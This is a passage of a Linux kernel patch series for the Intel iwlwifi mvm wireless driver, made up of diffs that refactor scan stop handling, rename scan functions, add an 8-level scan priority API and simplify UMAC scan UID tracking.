Signed-off-by: Luciano Coelho Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index 13469315ed33..df0199ec4da7 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -2360,10 +2360,8 @@ static void iwl_mvm_bss_info_changed(struct ieee80211_hw *hw, mutex_lock(&mvm->mutex); - if (changes & BSS_CHANGED_IDLE && !bss_conf->idle) { + if (changes & BSS_CHANGED_IDLE && !bss_conf->idle) iwl_mvm_sched_scan_stop(mvm, true); - iwl_mvm_reg_scan_stop(mvm); - } switch (vif->type) { case NL80211_IFTYPE_STATION: From 5d2e8d932c1c3d64418842c159862d003135ad0b Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Tue, 5 May 2015 10:05:42 +0300 Subject: [PATCH 382/872] iwlwifi: mvm: combine part of the scan stop flows For UMAC scans, we were simply jumping into another function when scan stop functions were called, while for LMAC scans, the flow continued. To make the flows cleaner and more balanced, combine the UMAC part into the main stop functions. This also makes us take one step closer into combining the state flags for both APIs. Note that some STOPPING flags will be dangling in UMAC scans, but it doesn't matter because they are not used in UMAC yet (and this will be fixed in subsequent patches). Signed-off-by: Luciano Coelho Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 40 ++++++++----------------- 1 file changed, 12 insertions(+), 28 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 579b36b0fecb..ec8ef56a15ab 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -101,7 +101,7 @@ struct iwl_mvm_scan_params { } schedule[2]; }; -static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type, bool notify); +static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type); static u8 iwl_mvm_scan_rx_ant(struct iwl_mvm *mvm) { @@ -889,9 +889,6 @@ int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm) { int ret; - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - return iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR, true); - if (!(mvm->scan_status & IWL_MVM_SCAN_REGULAR)) return 0; @@ -900,7 +897,11 @@ int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm) goto out; } - ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); + if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + ret = iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); + else + ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); + if (!ret) mvm->scan_status |= IWL_MVM_SCAN_STOPPING_REGULAR; out: @@ -922,9 +923,6 @@ int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify) { int ret; - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - return iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_SCHED, notify); - if (!(mvm->scan_status & IWL_MVM_SCAN_SCHED)) return 0; @@ -933,7 +931,11 @@ int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify) goto out; } - ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); + if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + ret = iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); + else + ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); + if (!ret) mvm->scan_status |= IWL_MVM_SCAN_STOPPING_SCHED; out: @@ -1585,7 +1587,7 @@ static int iwl_umac_scan_abort_one(struct iwl_mvm *mvm, u32 uid) return 
iwl_mvm_send_cmd_pdu(mvm, SCAN_ABORT_UMAC, 0, sizeof(cmd), &cmd); } -static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type, bool notify) +static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type) { struct iwl_notification_wait wait_scan_done; static const u8 scan_done_notif[] = { SCAN_COMPLETE_UMAC, }; @@ -1606,13 +1608,6 @@ static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type, bool notify) if (mvm->scan_uid[i] & type) { int err; - if (iwl_mvm_is_radio_killed(mvm) && - (type & IWL_MVM_SCAN_REGULAR)) { - ieee80211_scan_completed(mvm->hw, true); - iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); - break; - } - err = iwl_umac_scan_abort_one(mvm, mvm->scan_uid[i]); if (!err) ret = 0; @@ -1626,17 +1621,6 @@ static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type, bool notify) } ret = iwl_wait_notification(&mvm->notif_wait, &wait_scan_done, 1 * HZ); - if (ret) - return ret; - - if (notify) { - if (type & IWL_MVM_SCAN_SCHED) - ieee80211_sched_scan_stopped(mvm->hw); - if (type & IWL_MVM_SCAN_REGULAR) { - ieee80211_scan_completed(mvm->hw, true); - iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); - } - } return ret; } From dfbf156d05a43f5ffb918f25bc75265ed39011f0 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Tue, 5 May 2015 11:21:34 +0300 Subject: [PATCH 383/872] iwlwifi: mvm: rename umac scan stop function For consistency with the LMAC functions, rename the UMAC scan stop function to iwl_mvm_umac_scan_stop(). Additionally, move things around a bit to avoid an unnecessary forward declaration. Signed-off-by: Luciano Coelho Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 126 ++++++++++++------------ 1 file changed, 62 insertions(+), 64 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index ec8ef56a15ab..bee92d72f263 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -101,8 +101,6 @@ struct iwl_mvm_scan_params { } schedule[2]; }; -static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type); - static u8 iwl_mvm_scan_rx_ant(struct iwl_mvm *mvm) { if (mvm->scan_rx_ant != ANT_NONE) @@ -885,67 +883,6 @@ static int iwl_mvm_scan_lmac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, return 0; } -int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm) -{ - int ret; - - if (!(mvm->scan_status & IWL_MVM_SCAN_REGULAR)) - return 0; - - if (iwl_mvm_is_radio_killed(mvm)) { - ret = 0; - goto out; - } - - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - ret = iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); - else - ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); - - if (!ret) - mvm->scan_status |= IWL_MVM_SCAN_STOPPING_REGULAR; -out: - /* Clear the scan status so the next scan requests will - * succeed and mark the scan as stopping, so that the Rx - * handler doesn't do anything, as the scan was stopped from - * above. Since the rx handler won't do anything now, we have - * to release the scan reference here. 
- */ - iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); - - mvm->scan_status &= ~IWL_MVM_SCAN_REGULAR; - ieee80211_scan_completed(mvm->hw, true); - - return ret; -} - -int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify) -{ - int ret; - - if (!(mvm->scan_status & IWL_MVM_SCAN_SCHED)) - return 0; - - if (iwl_mvm_is_radio_killed(mvm)) { - ret = 0; - goto out; - } - - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - ret = iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); - else - ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); - - if (!ret) - mvm->scan_status |= IWL_MVM_SCAN_STOPPING_SCHED; -out: - mvm->scan_status &= ~IWL_MVM_SCAN_SCHED; - if (notify) - ieee80211_sched_scan_stopped(mvm->hw); - - return ret; -} - /* UMAC scan API */ struct iwl_umac_scan_done { @@ -1587,7 +1524,7 @@ static int iwl_umac_scan_abort_one(struct iwl_mvm *mvm, u32 uid) return iwl_mvm_send_cmd_pdu(mvm, SCAN_ABORT_UMAC, 0, sizeof(cmd), &cmd); } -static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type) +static int iwl_mvm_umac_scan_stop(struct iwl_mvm *mvm, int type) { struct iwl_notification_wait wait_scan_done; static const u8 scan_done_notif[] = { SCAN_COMPLETE_UMAC, }; @@ -1681,3 +1618,64 @@ void iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm) ieee80211_sched_scan_stopped(mvm->hw); } } + +int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm) +{ + int ret; + + if (!(mvm->scan_status & IWL_MVM_SCAN_REGULAR)) + return 0; + + if (iwl_mvm_is_radio_killed(mvm)) { + ret = 0; + goto out; + } + + if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + ret = iwl_mvm_umac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); + else + ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); + + if (!ret) + mvm->scan_status |= IWL_MVM_SCAN_STOPPING_REGULAR; +out: + /* Clear the scan status so the next scan requests will + * succeed and mark the scan as stopping, so that the Rx + * handler doesn't do anything, as the scan was stopped from + * above. Since the rx handler won't do anything now, we have + * to release the scan reference here. + */ + iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); + + mvm->scan_status &= ~IWL_MVM_SCAN_REGULAR; + ieee80211_scan_completed(mvm->hw, true); + + return ret; +} + +int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify) +{ + int ret; + + if (!(mvm->scan_status & IWL_MVM_SCAN_SCHED)) + return 0; + + if (iwl_mvm_is_radio_killed(mvm)) { + ret = 0; + goto out; + } + + if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + ret = iwl_mvm_umac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); + else + ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); + + if (!ret) + mvm->scan_status |= IWL_MVM_SCAN_STOPPING_SCHED; +out: + mvm->scan_status &= ~IWL_MVM_SCAN_SCHED; + if (notify) + ieee80211_sched_scan_stopped(mvm->hw); + + return ret; +} From 6e56f01deadd50997ebca899e3260dad554e4c47 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Wed, 6 May 2015 16:03:39 +0300 Subject: [PATCH 384/872] iwlwifi: mvm: rename some LMAC-specific scan functions Some LMAC specific functions had too generic names (i.e. *_scan_offload_*) and were hard to distinguish from functions that are really generic. Rename these functions to *_lmac_scan_* in to make it more consistent and easier to read. 
Signed-off-by: Luciano Coelho Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mvm.h | 18 +++++++++--------- drivers/net/wireless/iwlwifi/mvm/ops.c | 6 +++--- drivers/net/wireless/iwlwifi/mvm/scan.c | 22 +++++++++++----------- 3 files changed, 23 insertions(+), 23 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index 71b776358dc0..760c626ec13e 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -1127,21 +1127,21 @@ int iwl_mvm_max_scan_ie_len(struct iwl_mvm *mvm); void iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm); /* Scheduled scan */ -int iwl_mvm_rx_scan_offload_complete_notif(struct iwl_mvm *mvm, - struct iwl_rx_cmd_buffer *rxb, - struct iwl_device_cmd *cmd); -int iwl_mvm_rx_scan_offload_iter_complete_notif(struct iwl_mvm *mvm, - struct iwl_rx_cmd_buffer *rxb, - struct iwl_device_cmd *cmd); +int iwl_mvm_rx_lmac_scan_complete_notif(struct iwl_mvm *mvm, + struct iwl_rx_cmd_buffer *rxb, + struct iwl_device_cmd *cmd); +int iwl_mvm_rx_lmac_scan_iter_complete_notif(struct iwl_mvm *mvm, + struct iwl_rx_cmd_buffer *rxb, + struct iwl_device_cmd *cmd); int iwl_mvm_sched_scan_start(struct iwl_mvm *mvm, struct ieee80211_vif *vif, struct cfg80211_sched_scan_request *req, struct ieee80211_scan_ies *ies, int type); int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify); -int iwl_mvm_rx_scan_offload_results(struct iwl_mvm *mvm, - struct iwl_rx_cmd_buffer *rxb, - struct iwl_device_cmd *cmd); +int iwl_mvm_rx_scan_match_found(struct iwl_mvm *mvm, + struct iwl_rx_cmd_buffer *rxb, + struct iwl_device_cmd *cmd); /* UMAC scan */ int iwl_mvm_config_scan(struct iwl_mvm *mvm); diff --git a/drivers/net/wireless/iwlwifi/mvm/ops.c b/drivers/net/wireless/iwlwifi/mvm/ops.c index 4935caf6543f..690b33677510 100644 --- a/drivers/net/wireless/iwlwifi/mvm/ops.c +++ b/drivers/net/wireless/iwlwifi/mvm/ops.c @@ -238,10 +238,10 @@ static const struct iwl_rx_handlers iwl_mvm_rx_handlers[] = { RX_HANDLER(EOSP_NOTIFICATION, iwl_mvm_rx_eosp_notif, false), RX_HANDLER(SCAN_ITERATION_COMPLETE, - iwl_mvm_rx_scan_offload_iter_complete_notif, false), + iwl_mvm_rx_lmac_scan_iter_complete_notif, false), RX_HANDLER(SCAN_OFFLOAD_COMPLETE, - iwl_mvm_rx_scan_offload_complete_notif, true), - RX_HANDLER(MATCH_FOUND_NOTIFICATION, iwl_mvm_rx_scan_offload_results, + iwl_mvm_rx_lmac_scan_complete_notif, true), + RX_HANDLER(MATCH_FOUND_NOTIFICATION, iwl_mvm_rx_scan_match_found, false), RX_HANDLER(SCAN_COMPLETE_UMAC, iwl_mvm_rx_umac_scan_complete_notif, true), diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index bee92d72f263..9bececec9ce5 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -325,9 +325,9 @@ static u8 *iwl_mvm_dump_channel_list(struct iwl_scan_results_notif *res, return buf; } -int iwl_mvm_rx_scan_offload_iter_complete_notif(struct iwl_mvm *mvm, - struct iwl_rx_cmd_buffer *rxb, - struct iwl_device_cmd *cmd) +int iwl_mvm_rx_lmac_scan_iter_complete_notif(struct iwl_mvm *mvm, + struct iwl_rx_cmd_buffer *rxb, + struct iwl_device_cmd *cmd) { struct iwl_rx_packet *pkt = rxb_addr(rxb); struct iwl_lmac_scan_complete_notif *notif = (void *)pkt->data; @@ -342,9 +342,9 @@ int iwl_mvm_rx_scan_offload_iter_complete_notif(struct iwl_mvm *mvm, return 0; } -int iwl_mvm_rx_scan_offload_results(struct iwl_mvm *mvm, - struct iwl_rx_cmd_buffer *rxb, - struct iwl_device_cmd *cmd) +int iwl_mvm_rx_scan_match_found(struct 
iwl_mvm *mvm, + struct iwl_rx_cmd_buffer *rxb, + struct iwl_device_cmd *cmd) { IWL_DEBUG_SCAN(mvm, "Scheduled scan results\n"); ieee80211_sched_scan_results(mvm->hw); @@ -352,9 +352,9 @@ int iwl_mvm_rx_scan_offload_results(struct iwl_mvm *mvm, return 0; } -int iwl_mvm_rx_scan_offload_complete_notif(struct iwl_mvm *mvm, - struct iwl_rx_cmd_buffer *rxb, - struct iwl_device_cmd *cmd) +int iwl_mvm_rx_lmac_scan_complete_notif(struct iwl_mvm *mvm, + struct iwl_rx_cmd_buffer *rxb, + struct iwl_device_cmd *cmd) { struct iwl_rx_packet *pkt = rxb_addr(rxb); struct iwl_periodic_scan_complete *scan_notif = (void *)pkt->data; @@ -557,7 +557,7 @@ static bool iwl_mvm_scan_pass_all(struct iwl_mvm *mvm, return true; } -static int iwl_mvm_send_scan_offload_abort(struct iwl_mvm *mvm) +static int iwl_mvm_send_lmac_scan_abort(struct iwl_mvm *mvm) { int ret; struct iwl_host_cmd cmd = { @@ -598,7 +598,7 @@ static int iwl_mvm_lmac_scan_stop(struct iwl_mvm *mvm, int type) ARRAY_SIZE(scan_done_notif), NULL, NULL); - ret = iwl_mvm_send_scan_offload_abort(mvm); + ret = iwl_mvm_send_lmac_scan_abort(mvm); if (ret) { IWL_DEBUG_SCAN(mvm, "Send stop %sscan failed %d\n", sched ? "offloaded " : "", ret); From d7afbfc418a66459d1cf2e441aa50854da5e6297 Mon Sep 17 00:00:00 2001 From: Avraham Stern Date: Tue, 12 May 2015 12:19:48 +0300 Subject: [PATCH 385/872] iwlwifi: mvm: add support for 8 level scan priority API Add support for scan priority API with 8 levels instead of the existing 3 levels. This API is needed to define the priority of new ooc activities, e.g. gscan. Add a TLV flag to indicate if the new API is supported so that devices that does not support the new API will continue to use the old one. Signed-off-by: Avraham Stern Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-fw-file.h | 3 +++ .../net/wireless/iwlwifi/mvm/fw-api-scan.h | 11 ++++++++ drivers/net/wireless/iwlwifi/mvm/scan.c | 26 ++++++++++++++++--- 3 files changed, 36 insertions(+), 4 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-fw-file.h b/drivers/net/wireless/iwlwifi/iwl-fw-file.h index c7cfc38a2644..839b2c4a1ad8 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fw-file.h +++ b/drivers/net/wireless/iwlwifi/iwl-fw-file.h @@ -255,6 +255,8 @@ enum iwl_ucode_tlv_flag { * @IWL_UCODE_TLV_API_LQ_SS_PARAMS: Configure STBC/BFER via LQ CMD ss_params * @IWL_UCODE_TLV_API_STATS_V10: uCode supports/uses statistics API version 10 * @IWL_UCODE_TLV_API_NEW_VERSION: new versioning format + * @IWL_UCODE_TLV_API_EXT_SCAN_PRIORITY: scan APIs use 8-level priority + * instead of 3. 
*/ enum iwl_ucode_tlv_api { IWL_UCODE_TLV_API_BT_COEX_SPLIT = BIT(3), @@ -269,6 +271,7 @@ enum iwl_ucode_tlv_api { IWL_UCODE_TLV_API_LQ_SS_PARAMS = BIT(18), IWL_UCODE_TLV_API_STATS_V10 = BIT(19), IWL_UCODE_TLV_API_NEW_VERSION = BIT(20), + IWL_UCODE_TLV_API_EXT_SCAN_PRIORITY = BIT(24), }; /** diff --git a/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h b/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h index 022869323ca9..f34cf002e243 100644 --- a/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h +++ b/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h @@ -431,6 +431,17 @@ enum iwl_scan_priority { IWL_SCAN_PRIORITY_HIGH, }; +enum iwl_scan_priority_ext { + IWL_SCAN_PRIORITY_EXT_0_LOWEST, + IWL_SCAN_PRIORITY_EXT_1, + IWL_SCAN_PRIORITY_EXT_2, + IWL_SCAN_PRIORITY_EXT_3, + IWL_SCAN_PRIORITY_EXT_4, + IWL_SCAN_PRIORITY_EXT_5, + IWL_SCAN_PRIORITY_EXT_6, + IWL_SCAN_PRIORITY_EXT_7_HIGHEST, +}; + /** * iwl_scan_req_lmac - SCAN_REQUEST_CMD_API_S_VER_1 * @reserved1: for alignment and future use diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 9bececec9ce5..d0312f0caffc 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -744,6 +744,21 @@ iwl_mvm_build_scan_probe(struct iwl_mvm *mvm, struct ieee80211_vif *vif, params->preq.common_data.len = cpu_to_le16(ies->common_ie_len); } +static __le32 iwl_mvm_scan_priority(struct iwl_mvm *mvm, + enum iwl_scan_priority_ext prio) +{ + if (mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_EXT_SCAN_PRIORITY) + return cpu_to_le32(prio); + + if (prio <= IWL_SCAN_PRIORITY_EXT_2) + return cpu_to_le32(IWL_SCAN_PRIORITY_LOW); + + if (prio <= IWL_SCAN_PRIORITY_EXT_4) + return cpu_to_le32(IWL_SCAN_PRIORITY_MEDIUM); + + return cpu_to_le32(IWL_SCAN_PRIORITY_HIGH); +} + static void iwl_mvm_scan_lmac_dwell(struct iwl_mvm *mvm, struct iwl_scan_req_lmac *cmd, struct iwl_mvm_scan_params *params) @@ -755,7 +770,7 @@ static void iwl_mvm_scan_lmac_dwell(struct iwl_mvm *mvm, params->dwell[IEEE80211_BAND_2GHZ].fragmented; cmd->max_out_time = cpu_to_le32(params->max_out_time); cmd->suspend_time = cpu_to_le32(params->suspend_time); - cmd->scan_prio = cpu_to_le32(IWL_SCAN_PRIORITY_HIGH); + cmd->scan_prio = iwl_mvm_scan_priority(mvm, IWL_SCAN_PRIORITY_EXT_6); } static inline bool iwl_mvm_scan_fits(struct iwl_mvm *mvm, int n_ssids, @@ -1070,12 +1085,15 @@ static void iwl_mvm_scan_umac_dwell(struct iwl_mvm *mvm, params->dwell[IEEE80211_BAND_2GHZ].fragmented; cmd->max_out_time = cpu_to_le32(params->max_out_time); cmd->suspend_time = cpu_to_le32(params->suspend_time); - cmd->scan_priority = cpu_to_le32(IWL_SCAN_PRIORITY_HIGH); + cmd->scan_priority = + iwl_mvm_scan_priority(mvm, IWL_SCAN_PRIORITY_EXT_6); if (iwl_mvm_scan_total_iterations(params) == 0) - cmd->ooc_priority = cpu_to_le32(IWL_SCAN_PRIORITY_HIGH); + cmd->ooc_priority = + iwl_mvm_scan_priority(mvm, IWL_SCAN_PRIORITY_EXT_6); else - cmd->ooc_priority = cpu_to_le32(IWL_SCAN_PRIORITY_LOW); + cmd->ooc_priority = + iwl_mvm_scan_priority(mvm, IWL_SCAN_PRIORITY_EXT_2); } static void From 6185af2aad5b1bd63d962008c6449f3ae3ef896b Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Thu, 7 May 2015 11:13:24 +0300 Subject: [PATCH 386/872] iwlwifi: mvm: refactor UMAC scan UID handling We can only have one scan of each type running at the same time, so we can remove one attribute in the UID information we save. We had array index, UID and type, but only UID (== array_index) and type are necessary. Refactor the code to use this simplified array. 
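A stand-alone sketch of that bookkeeping, with invented sizes and type values (the driver's lookup returns -ENOENT rather than -1):

    #include <stdio.h>

    #define MAX_SCANS       4
    #define SCAN_REGULAR    (1 << 0)
    #define SCAN_SCHED      (1 << 1)

    /* indexed by UID; holds the scan type, or 0 when the slot is free */
    static int scan_uid_status[MAX_SCANS];

    static int uid_by_status(int status)
    {
            int i;

            for (i = 0; i < MAX_SCANS; i++)
                    if (scan_uid_status[i] == status)
                            return i;
            return -1;
    }

    int main(void)
    {
            int uid;

            uid = uid_by_status(0);                 /* grab a free slot */
            if (uid < 0)
                    return 1;
            scan_uid_status[uid] = SCAN_SCHED;      /* its index is the UID */

            printf("sched scan uid: %d\n", uid_by_status(SCAN_SCHED));

            scan_uid_status[uid] = 0;               /* completion clears the slot */
            printf("sched scan uid after completion: %d\n",
                   uid_by_status(SCAN_SCHED));
            return 0;
    }

Because the UID doubles as the array index, completing or aborting a scan only has to zero its slot.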
Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 8 +- drivers/net/wireless/iwlwifi/mvm/mvm.h | 3 +- drivers/net/wireless/iwlwifi/mvm/scan.c | 126 ++++++-------------- 3 files changed, 39 insertions(+), 98 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index df0199ec4da7..cea236b6c2ed 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -1434,10 +1434,10 @@ void __iwl_mvm_mac_stop(struct iwl_mvm *mvm) int i; for (i = 0; i < mvm->max_scans; i++) { - if (WARN_ONCE(mvm->scan_uid[i], - "UMAC scan UID %d was not cleaned\n", - mvm->scan_uid[i])) - mvm->scan_uid[i] = 0; + if (WARN_ONCE(mvm->scan_uid_status[i], + "UMAC scan UID %d status was not cleaned\n", + i)) + mvm->scan_uid_status[i] = 0; } } diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index 760c626ec13e..f22d30988c96 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -628,8 +628,7 @@ struct iwl_mvm { unsigned int max_scans; /* UMAC scan tracking */ - u32 scan_uid[IWL_MVM_MAX_UMAC_SCANS]; - u8 scan_seq_num, sched_scan_seq_num; + u32 scan_uid_status[IWL_MVM_MAX_UMAC_SCANS]; /* rx chain antennas set through debugfs for the scan command */ u8 scan_rx_ant; diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index d0312f0caffc..496d1dfe4f7b 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -1013,65 +1013,15 @@ int iwl_mvm_config_scan(struct iwl_mvm *mvm) return ret; } -static int iwl_mvm_find_scan_uid(struct iwl_mvm *mvm, u32 uid) +static int iwl_mvm_scan_uid_by_status(struct iwl_mvm *mvm, int status) { int i; for (i = 0; i < mvm->max_scans; i++) - if (mvm->scan_uid[i] == uid) + if (mvm->scan_uid_status[i] == status) return i; - return i; -} - -static int iwl_mvm_find_free_scan_uid(struct iwl_mvm *mvm) -{ - return iwl_mvm_find_scan_uid(mvm, 0); -} - -static bool iwl_mvm_find_scan_type(struct iwl_mvm *mvm, int type) -{ - int i; - - for (i = 0; i < mvm->max_scans; i++) - if (mvm->scan_uid[i] & type) - return true; - - return false; -} - -static int iwl_mvm_find_first_scan(struct iwl_mvm *mvm, int type) -{ - int i; - - for (i = 0; i < mvm->max_scans; i++) - if (mvm->scan_uid[i] & type) - return i; - - return i; -} - -static u32 iwl_generate_scan_uid(struct iwl_mvm *mvm, int type) -{ - u32 uid; - - /* make sure exactly one bit is on in scan type */ - WARN_ON(hweight8(type) != 1); - - /* - * Make sure scan uids are unique. If one scan lasts long time while - * others are completing frequently, the seq number will wrap up and - * we may have more than one scan with the same uid. 
- */ - do { - uid = type | (mvm->scan_seq_num << - IWL_UMAC_SCAN_UID_SEQ_OFFSET); - mvm->scan_seq_num++; - } while (iwl_mvm_find_scan_uid(mvm, uid) < mvm->max_scans); - - IWL_DEBUG_SCAN(mvm, "Generated scan UID %u\n", uid); - - return uid; + return -ENOENT; } static void iwl_mvm_scan_umac_dwell(struct iwl_mvm *mvm, @@ -1146,22 +1096,22 @@ static u32 iwl_mvm_scan_umac_flags(struct iwl_mvm *mvm, } static int iwl_mvm_scan_umac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, - struct iwl_mvm_scan_params *params) + struct iwl_mvm_scan_params *params, + int type) { struct iwl_scan_req_umac *cmd = mvm->scan_cmd; struct iwl_scan_req_umac_tail *sec_part = (void *)&cmd->data + sizeof(struct iwl_scan_channel_cfg_umac) * mvm->fw->ucode_capa.n_scan_channels; - u32 uid; + int uid; u32 ssid_bitmap = 0; int n_iterations = iwl_mvm_scan_total_iterations(params); - int uid_idx; lockdep_assert_held(&mvm->mutex); - uid_idx = iwl_mvm_find_free_scan_uid(mvm); - if (uid_idx >= mvm->max_scans) - return -EBUSY; + uid = iwl_mvm_scan_uid_by_status(mvm, 0); + if (uid < 0) + return uid; memset(cmd, 0, ksize(cmd)); cmd->hdr.size = cpu_to_le16(iwl_mvm_scan_size(mvm) - @@ -1169,14 +1119,9 @@ static int iwl_mvm_scan_umac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, iwl_mvm_scan_umac_dwell(mvm, cmd, params); - if (n_iterations == 1) - uid = iwl_generate_scan_uid(mvm, IWL_MVM_SCAN_REGULAR); - else - uid = iwl_generate_scan_uid(mvm, IWL_MVM_SCAN_SCHED); + mvm->scan_uid_status[uid] = type; - mvm->scan_uid[uid_idx] = uid; cmd->uid = cpu_to_le32(uid); - cmd->general_flags = cpu_to_le32(iwl_mvm_scan_umac_flags(mvm, params)); if (iwl_mvm_scan_use_ebs(mvm, n_iterations)) @@ -1308,7 +1253,8 @@ int iwl_mvm_reg_scan_start(struct iwl_mvm *mvm, struct ieee80211_vif *vif, if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { hcmd.id = SCAN_REQ_UMAC; - ret = iwl_mvm_scan_umac(mvm, vif, ¶ms); + ret = iwl_mvm_scan_umac(mvm, vif, ¶ms, + IWL_MVM_SCAN_REGULAR); } else { hcmd.id = SCAN_OFFLOAD_REQUEST_CMD; ret = iwl_mvm_scan_lmac(mvm, vif, ¶ms); @@ -1415,7 +1361,7 @@ int iwl_mvm_sched_scan_start(struct iwl_mvm *mvm, if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { hcmd.id = SCAN_REQ_UMAC; - ret = iwl_mvm_scan_umac(mvm, 